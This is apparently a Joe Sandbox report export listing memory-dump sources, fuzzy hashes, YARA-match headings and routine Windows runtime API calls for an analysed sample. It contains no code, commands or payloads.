                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                • Instruction ID: d37e877d86d73c52924664153ee92ef16672d0019c3941fc23b153a9769a82a1
                • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                • Instruction Fuzzy Hash: 8C428071D10208DBDF24EFA4C885BDEB7F5BF04308F244169D859AB290E739AA45CFA5
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                • Instruction ID: c53936f3d8cb668cc1917fc39e1f55a9f8a54b9639c31b8c681bef042e9f2570
                • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                • Instruction Fuzzy Hash: 73526270E00259DFDB10DBA4C848FBEBBB9BF49704F148198E505AB295DB35AD49CFA0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID: $
                • API String ID: 0-3993045852
                • Opcode ID: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                • Instruction ID: d65284facd1083da85c4ef1ca5e99ba8d77141628261c72e06b1d64e31111194
                • Opcode Fuzzy Hash: 1cca9afa04801860d959689bc8690a28a22b5c0188d9fdbf1e0bc31c4e8f15f0
                • Instruction Fuzzy Hash: 563263B0E0022D9AEF619F64CC44BAFB779FF45704F0441EAEA0DA6190DB748A84CF59
                APIs
                • SetUnhandledExceptionFilter.KERNEL32(Function_000071AF), ref: 004071F6
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: ExceptionFilterUnhandled
                • String ID:
                • API String ID: 3192549508-0
                • Opcode ID: f28cc46c5a69fb661929fb95297e4dc903b008856ab76e47b28753c41d2cb2bb
                • Instruction ID: 901a5381324bca2dd0acfe335e8ee86ad77826d3c9a08445f0c28344b4b3f2d2
                • Opcode Fuzzy Hash: f28cc46c5a69fb661929fb95297e4dc903b008856ab76e47b28753c41d2cb2bb
                • Instruction Fuzzy Hash: 6090223020020082C3002BB00C0C20032880A0C3023200030A002EC2E0CA388000000A
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                • Instruction ID: a4faae1c56d1b94308cd66d33812518902a0d10b54f62d3db9f327eb610a42b4
                • Opcode Fuzzy Hash: 877f63b2793ebbe0b59198544446deee2a7ddffc7aca60e89c3a6b5019f50021
                • Instruction Fuzzy Hash: DD42B071629F158BC3DADF24C88055BF3E1FFC8218F048A1DD99997A94DB38F819CA91
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                • Instruction ID: 34b5381eb19a93447ec962caa979701fd5331a8a174904f39f84fcfaddc8fedb
                • Opcode Fuzzy Hash: e5f2568764100725235c6401e73ec7c3249674854c723175d34cd2e4a517ce8f
                • Instruction Fuzzy Hash: 9D22D0B6904B028FC714CF19D08065AF7E1FF88324F558A6EE9A9A7B14C730BA55CF81
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                • Instruction ID: 05d082330c416e67c06a532964af8df8e1104b9eb0c871c855bdc4d54a32604c
                • Opcode Fuzzy Hash: 91ba71904dea84e20fa54172000c9738ff60065219db22b0a49b9952a31d8242
                • Instruction Fuzzy Hash: CDF1B571344B058FC758DE5DDDA1B16F7E5AB88318F19C728919ACBB64E378F8068B80
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                • Instruction ID: 81ce7a8ff4ce3bbeaf870a5ad22376b87e27cf53d294c26b7d2babc630f47e05
                • Opcode Fuzzy Hash: fbc65900fc73bc000bc8580b4acecc80d5647e222a799f60cb590115ce9fd550
                • Instruction Fuzzy Hash: 23028F711187058FC756EE1CD49036AF3E2FFC8309F19892DD68987B64E739A9198F82
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                • Instruction ID: 43d8f7f55a76fffef0bd3a65d78cf1b224a6dc4ba3be5126c0668f2c475a8cc5
                • Opcode Fuzzy Hash: 0a5954790e41dc4624a9d46858f3452b98d53d0cd8c243c9cc9c775596d105f9
                • Instruction Fuzzy Hash: 5AC12933E2477906D764DEAE8C540AAB6E3AFC4220F9B477DDDD4A7242C9306D4A86C0
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                • Instruction ID: 5f61e511272d261f47b1004c4efc4e09fd0721e474e1f518360659ba3fe56106
                • Opcode Fuzzy Hash: 260573a8829919281ce9b140437ef2de714630fc7763413699c1452f37438119
                • Instruction Fuzzy Hash: E4A1EA0A8090E4ABEF455A7E90B63FBAFE9CB27354E76719284D85B793C019120FDF50
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                • Opcode Fuzzy Hash: f27a0b4d4ac2ce6bc1e4b63d0c78f0f0db76eb82bb00af9427607acde08c7a9f
                • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction ID: c38ad2f0d992149f2356cf4734062671f0575d876e376eb99557c820ec647bea
                • Opcode Fuzzy Hash: b02fe9d9872fded329b77120f2c573e6cf8b0d350d9fa23001143a57df52eae3
                • Instruction Fuzzy Hash: ADC1AEB5E003499FCB54CFA9C885AEEFBF1FF48200F24856AD959E7301E334AA458B54
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                • Instruction ID: e7bcadfb5b299f8f825575d55cdfb803af43be0a427bce367c24f51a6feb7c76
                • Opcode Fuzzy Hash: 9479a41546b8b9daa844b3f0f9bcf180ed8e63d922313bf96b91a02671daf30e
                • Instruction Fuzzy Hash: 8BB18460039FA686CBD3FF30911028BF7E0BFC525DF44194AD59986864EB3EE94E9215
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                • Instruction ID: 02cbf269ac02bba31aaf0577a4f14c1351d2713f814b0910711735ca2bb7c66c
                • Opcode Fuzzy Hash: a087d59a956fa7918cd600c7f095cfaed33154cdf998442540aba7f69786321b
                • Instruction Fuzzy Hash: E19114739187BA06D7609EAE8C441B9B6E3AFC4210F9B077ADD9467282C9309E0697D0
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                • Instruction ID: c01b22a18f435d180d00ee82b95ddb39f84da72bbce2d2c7dafa4a8e8238584d
                • Opcode Fuzzy Hash: 61293238dc523bda29a07f89e573218fa02bdd4a3ea5a0101b4e634da50cabe3
                • Instruction Fuzzy Hash: 26B17AB5E002599FCB84CFE9C885ADEFBF0FF48210F64916AD919E7301E334AA558B54
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                • Instruction ID: 7aa696db2501e0fdd21a4887d05f0865f3a558ffc54352dee3d73602b86f55d4
                • Opcode Fuzzy Hash: 2aad1ace9f17e27fc90b6d8408a6fd0dde4342c6dd5611bbc4c971f1f4f8439c
                • Instruction Fuzzy Hash: E771D473A20B254B8314DEB98D94192F2F1EF84610B57C27CCE84E7B45EB31B95A96C0
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                • Instruction ID: 8dfee2a3e3f008afc56da768acebbac91ccf312e1b45b512186ac2baf8f703f5
                • Opcode Fuzzy Hash: a34512ff72d5238815f0e29e494786616004433761634013c39009702cee8180
                • Instruction Fuzzy Hash: FF8137B2A047019FC328CF19D88566AF7E1FFD8210F19892DE99E83B41D770F8558B92
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                • Instruction ID: 77705babc55e1271eb1e83bf9c2dacf03e1a8502b57753e8a54baba662b05ceb
                • Opcode Fuzzy Hash: ad9f3a43cb7dd3b518013f9b6064ab15edb1b03e1d503d3f24361335b78b864c
                • Instruction Fuzzy Hash: 0F710622535B7A0AEBC3DA3D881446BF7D0BE4910AB850956DCD0F3181D72EDE4E77A4
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                • Instruction ID: 970a1371ce8212292308b44b2dd447f1005e9dde93b6e54d97d89c53407c4654
                • Opcode Fuzzy Hash: 3d5cdb525d0acefe293bc2cb43d2c02f70863ca624e14ca51f49ae32e7611bbb
                • Instruction Fuzzy Hash: E6815775A10B669BD714CF2ED8C046AFBF1FB08210B518A2ADCA583B41D334F565CFA4
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                • Instruction ID: 401466609254d942bafdae80dad2589073bb2fdf5e60031223e5c06b3f1c3e6b
                • Opcode Fuzzy Hash: 851fc9b6f54d0d524cfed56ff25d709cf64ba4b7deb611180c80db8baab8909e
                • Instruction Fuzzy Hash: F461A3339046BB5BDB649E6DD8401A9B7A2BFC4310F5B8A75DC9823642C234EA11DBD0
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                • Instruction ID: 6a9266043676503a0822b9e587a745910351572b0088a8558e888783f0bfb762
                • Opcode Fuzzy Hash: e99aa2f60f3c65b998b8173ecf6d62a85e0283f60168b484be672eab7d553dce
                • Instruction Fuzzy Hash: A0617C3791262B9BD761DF59D84527AB3A2EFC4360F6B8A358C0427642C734F9119BC4
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                • Instruction ID: 01efdcd3b7b8ee7d5a7dedf3b687a1e38e9713fbdd3ed35adb18656454f6a5a8
                • Opcode Fuzzy Hash: 213e8dd87d5c2f66bb6fb1c01bf5d713fa88062fa37de47d36406d71930442ef
                • Instruction Fuzzy Hash: C1512D229257B945EBC3DA3D88504BEBBE0BE49106B460557DCD0B3181C72EDE4DB7E4
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                • Instruction ID: f0ef39fb87bbcbabf7c087ccc32622f448b38fccad3fa450d398332d7bff4148
                • Opcode Fuzzy Hash: 7d91c7687d8e85e62bc80eb2502b46881ecafdad5d685667df6fa97b6554fb78
                • Instruction Fuzzy Hash: C4417C72E1872E47E34CFE169C9421AB39397C0250F4A8B3CCE5A973C1DA35B926C6C1
                Memory Dump Source
                • Source File: 00000000.00000002.1232942398.00000000022C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 022C9000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_22c9000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                • Instruction ID: 266489d956d6b42c24d99394abece41c83f9663193e8c6b58f9e4121fe48e9f2
                • Opcode Fuzzy Hash: 1d6b6acc52598ba466396b9b98489674ce8409ccf4a4742af8d6b4b599497031
                • Instruction Fuzzy Hash: B0316C7582A24A9FCB15CEB4D8A0AF9BB70FF47324F6897ACC0818B50AD325504BC7D4
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                • Instruction ID: 0490d86b4bce045c3c4fd50df124024f9d30e3e971c92668636fd4ef92e6cccb
                • Opcode Fuzzy Hash: dad9f5e2b4397fc96ae248ae23b4bb8b0f73d482c6b1a500fc30c3239f901945
                • Instruction Fuzzy Hash: 40315E7682976A4FC3D3FE61894010AF291FFC5118F4D4B6CCD505B690D73EAA4A9A82
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                • Instruction ID: 60050a84e6576c030dab970d1a2d7cd9f3cdcd031aee2cfef8b214ca5e5758eb
                • Opcode Fuzzy Hash: aca7381c331421ab033d5a8929ad27c90a0d590f00afa5b17f2b634ed140bded
                • Instruction Fuzzy Hash: B73134306283059FD311EF29C484A5BF7E5FFC8258F44C919F98897225D730E984CA62
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                • Instruction ID: 59c3ae1b995c94a09e1ae3a0237fb05caf48db30c8f261cbac264b745602b097
                • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                • Instruction Fuzzy Hash: 2B115B7720134243D654AA3ED4B46B7E3F9EBC6228B2C437AD0DA8F758D322E143D580
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                • Instruction ID: b8cee9e3cc57037a89dac062ff7dafebbfa2ef4337c3acbdc7e7fe454a83d06f
                • Opcode Fuzzy Hash: d5d2e5b651617a4f85808dc17347bd2f4f1c2507898c94840b2185a5104128c2
                • Instruction Fuzzy Hash: B611300A4492C4BDCF424A7840E56EBFFA58E27218F4A71DA84C45B743D01B150FE761
                Memory Dump Source
                • Source File: 00000000.00000002.1232942398.00000000022C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 022C9000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_22c9000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction ID: 44c5908904d9d496da26768eae95d58c99547d67b09222c8ff16c5a21497ad47
                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction Fuzzy Hash: 9A1182723502019FD754DF95DCC1FA673EAEB89330B298169ED08CB356D676E842CB60
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction ID: 2b55cc1dfcee1ae841cceb8a8f6831ceae7c0698753410ed11632ac5773c7a2b
                • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                • Instruction Fuzzy Hash: F8117C72340100AFEB58DE65DC95EB673EEFB89320B198165E908CB316D676E801CB60
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                • Instruction ID: 919d24ba8c22171396e67c0e2b97ba1d5e48dfd6b8ab3e5f4b794342c0a4ad1f
                • Opcode Fuzzy Hash: f7a2a3c4e4e7b1265b14b7c3247eccdedd29083849295e66ade5a7e6f19b4579
                • Instruction Fuzzy Hash: 410128768106629BD700DF3EC8C046AFBF1BB082117528B2ADC9083A41D334F662DBE4
                APIs
                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00404CC7), ref: 00405AD2
                • __mtterm.LIBCMT ref: 00405ADE
                  • Part of subcall function 00405817: DecodePointer.KERNEL32(00000004,00405C40,?,00404CC7), ref: 00405828
                  • Part of subcall function 00405817: TlsFree.KERNEL32(00000002,00405C40,?,00404CC7), ref: 00405842
                  • Part of subcall function 00405817: DeleteCriticalSection.KERNEL32(00000000,00000000,77755810,?,00405C40,?,00404CC7), ref: 0040690C
                  • Part of subcall function 00405817: _free.LIBCMT ref: 0040690F
                  • Part of subcall function 00405817: DeleteCriticalSection.KERNEL32(00000002,77755810,?,00405C40,?,00404CC7), ref: 00406936
                • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00405AF4
                • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00405B01
                • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00405B0E
                • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00405B1B
                • TlsAlloc.KERNEL32(?,00404CC7), ref: 00405B6B
                • TlsSetValue.KERNEL32(00000000,?,00404CC7), ref: 00405B86
                • __init_pointers.LIBCMT ref: 00405B90
                • EncodePointer.KERNEL32(?,00404CC7), ref: 00405BA1
                • EncodePointer.KERNEL32(?,00404CC7), ref: 00405BAE
                • EncodePointer.KERNEL32(?,00404CC7), ref: 00405BBB
                • EncodePointer.KERNEL32(?,00404CC7), ref: 00405BC8
                • DecodePointer.KERNEL32(0040599B,?,00404CC7), ref: 00405BE9
                • __calloc_crt.LIBCMT ref: 00405BFE
                • DecodePointer.KERNEL32(00000000,?,00404CC7), ref: 00405C18
                • GetCurrentThreadId.KERNEL32 ref: 00405C2A
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                • API String ID: 3698121176-3819984048
                • Opcode ID: e453eff6c939e06595647a079e020d1d2a7e17ef9b33201e5048023e24f2b737
                • Instruction ID: ff93dc7fedceda27c5767def707d918571edc12705d56ca78e07cd01d157566a
                • Opcode Fuzzy Hash: e453eff6c939e06595647a079e020d1d2a7e17ef9b33201e5048023e24f2b737
                • Instruction Fuzzy Hash: 42314A71910714DBDB207F76AE09A573BE9EB49760B14463BE600A62F0DF789841CF5C
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref__calloc_impl__copytlocinfo_nolock__setmbcp_nolock
                • String ID:
                • API String ID: 1442030790-0
                • Opcode ID: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction ID: c28c5f62bbeb4ce1f862dac667bb8806888dbe65730862c9cf9ffa50e1010d72
                • Opcode Fuzzy Hash: 6bd5cc8f3dd8ebf785cdc17837931ce977b5cf0fd4524e89a9393df48daa8713
                • Instruction Fuzzy Hash: FB21D231204701AEEB327F65DC03E1FBBEEDF81B61B608429F5895E9A4EB628550CF51
                APIs
                • _memset.LIBCMT ref: 02383F51
                  • Part of subcall function 02385BA8: __getptd_noexit.LIBCMT ref: 02385BA8
                • __gmtime64_s.LIBCMT ref: 02383FEA
                • __gmtime64_s.LIBCMT ref: 02384020
                • __gmtime64_s.LIBCMT ref: 0238403D
                • __allrem.LIBCMT ref: 02384093
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023840AF
                • __allrem.LIBCMT ref: 023840C6
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 023840E4
                • __allrem.LIBCMT ref: 023840FB
                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02384119
                • __invoke_watson.LIBCMT ref: 0238418A
                Memory Dump Source
